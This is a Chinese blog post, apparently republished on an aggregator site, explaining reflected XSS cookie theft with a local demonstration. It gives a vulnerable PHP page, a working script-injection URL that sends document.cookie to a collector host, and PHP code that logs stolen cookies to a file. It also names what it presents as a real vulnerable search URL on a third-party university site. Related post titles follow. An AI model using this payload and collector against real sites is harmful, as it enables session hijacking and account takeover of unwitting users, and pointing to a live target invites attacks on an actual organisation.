反射型xss偷取cookie(本地验证)
来源:互联网 发布:虾囧笑话源码 编辑:程序博客网 时间:2024/05/16 17:45
原理
反射型xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。
本地验证
xss漏洞地址:http://localhost/njuptsta/xss/reflect_xss.php?name=1
黑客收集cookie地址:http://localhost/1.php?c=
构造的url exploit :
值得注意的一点:
shellcode里面cookie和原始url连接的时候,用的是+。
然而在浏览器的地址栏里,+可能被解析成空格。
所以我们需要把+替换成url编码%2b。
这一点值得注意,花了两个晚上最后还是求助的别人才发现的。
—2015年11月16号更新。
http://localhost/njuptsta/xss/reflect_xss.php?name=1<script>document.location="http://localhost/1.php?c="%2bdocument.cookie</script>
源码:反射型xss漏洞
将用户输入显示在当前页面,存在反射型xss漏洞。
<html><body><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><form method = "get" action = "reflect_xss.php">反射型xss<br><input type = "text" name = "name"><br><input type = "submit"></form><?phpecho $_GET['name'];?></body></html>
源码:黑客收集cookie
<?php $cookie = $_GET['c']; $myfile = fopen("testfile.txt", "a"); fwrite($myfile, "cookie:".$cookie."\n"); fclose($myfile);?>
反射型xss漏洞存在地址:
http://jwc.shcmusic.edu.cn/plus/Search.asp?searchtype=1&channelid=1&KeyWord=123
0 0
- 反射型xss偷取cookie(本地验证)
- 利用xss偷cookie教学
- XSS偷取密码Cookies通用脚本
- 最简单的反射型XSS拿cookie
- xss(cookie劫持)
- 反射型xss实战演示
- 反射型xss实战演示
- 反射型XSS 之 防范
- 鸡肋的反射型xss
- XSS(偷你的Cookies)
- DVWA漏洞学习(2)反射型XSS
- php 偷取代码
- 偷取百度音乐。。。
- phpcms某处储存型XSS(demo+本地演示)
- 存储型XSS与反射型XSS有什么区别?
- 存储型XSS与反射型XSS漏洞
- 看我如何偷取别人的云储币(Siacoin)
- 小偷问题:如何偷取需要登录验证的页面数据?
- Switch中的参数
- Day 7(11.14):(10)练习答案
- MySQL日志——配置与查看二进制日志
- 转:笔记本电脑开机密码忘记的解决方法
- 字符设备驱动----LED驱动程序
- 反射型xss偷取cookie(本地验证)
- 第一次创建技术博客
- Mac OS X El Captain上安装MySQLdb
- android learn Layout_what in XML
- 改进的table单元格拖拽,可限制能拖动的连续单元格范围
- OpenCV中读取视频帧像素值的一般方法
- 构造和解析Json数据
- Normalization Methods
- android调试时apk可运行,导出签名的apk后, 有些功能闪退,